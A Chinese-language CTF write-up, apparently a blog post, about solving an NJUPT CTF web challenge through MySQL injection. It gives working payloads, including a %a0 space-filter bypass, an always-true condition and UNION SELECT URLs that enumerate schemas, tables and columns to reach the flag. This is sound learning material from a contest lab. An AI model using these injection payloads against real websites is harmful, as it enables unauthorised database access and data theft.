前些天 国光老哥在群里问有没有打NJUPT CTF的 校外和他组队 然后问了问光光老哥说是 面向校外 不能太简单 但是对新手也不会太不友好 然后就本着去学东西 练习的态度 抱老哥的大腿去(嘻嘻)最后果然 校外队第九 咳咳 虽然我只是观众 大佬们都很强哟 但是也不希望自己一直都是观众 所以 特此总结一些题 希望以后越来越🐮🍺
满怀自信的右键源代码 然后发现并没有flag 最后大佬们发现直接访问主域名 老把精力放在了secret.php 这上面
这道题 是自己复习的重点了
点进去 知道考察的是 mysql 注入 但是 当时自己就是搞不出来 还差的远 事后又请教了国光老哥
验证时候发现过滤了空格 用%a0即可绕过
'%a0||'1
这里直接查询出所有的数据了
如果没有这个语句的话 默认只查询出1条数据
‘ or ‘1 相当于构造出一个用真的条件
咳咳 大佬语录记录一下 !借助hackbar可以进行快速的注入
'%a0union%a0select%a01,2,3||'1
' union select 1,2,3 ||'1
闭合前面的引号 核心语句 查报错的字段数 构造用真条件 闭合后面语句
http://ctfgame.acdxvfsvd.net:20001/index.php?id=1%27%a0UNION%a0SELECT%a0(SELECT%a0GROUP_CONCAT(schema_name%a0SEPARATOR%a00x3c62723e)%a0FROM%a0INFORMATION_SCHEMA.SCHEMATA),2,3||%271
咳咳根据我多年打酱油的经验
http://ctfgame.acdxvfsvd.net:20001/index.php?id=1%27%a0UNION%a0SELECT%a0(SELECT%a0GROUP_CONCAT(table_name%a0SEPARATOR%a00x3c62723e)%a0FROM%a0INFORMATION_SCHEMA.TABLES%a0WHERE%a0TABLE_SCHEMA=0x666c6161616161616167),2,3||%271
f144444444g
http://ctfgame.acdxvfsvd.net:20001/index.php?id=1%27%a0UNION%a0SELECT%a0(SELECT%a0GROUP_CONCAT(column_name%a0SEPARATOR%a00x3c62723e)%a0FROM%a0INFORMATION_SCHEMA.COLUMNS%a0WHERE%a0TABLE_NAME=0x6631343434343434343467),2,3||%271
http://ctfgame.acdxvfsvd.net:20001/index.php?id=1%27%a0UNION%a0SELECT%a0(SELECT%a0GROUP_CONCAT(column_name%a0SEPARATOR%a00x3c62723e)%a0FROM%a0INFORMATION_SCHEMA.COLUMNS%a0WHERE%a0TABLE_NAME=0x6631343434343434343467),2,3||%271
nctf{this_1s_paocao_sqllllll}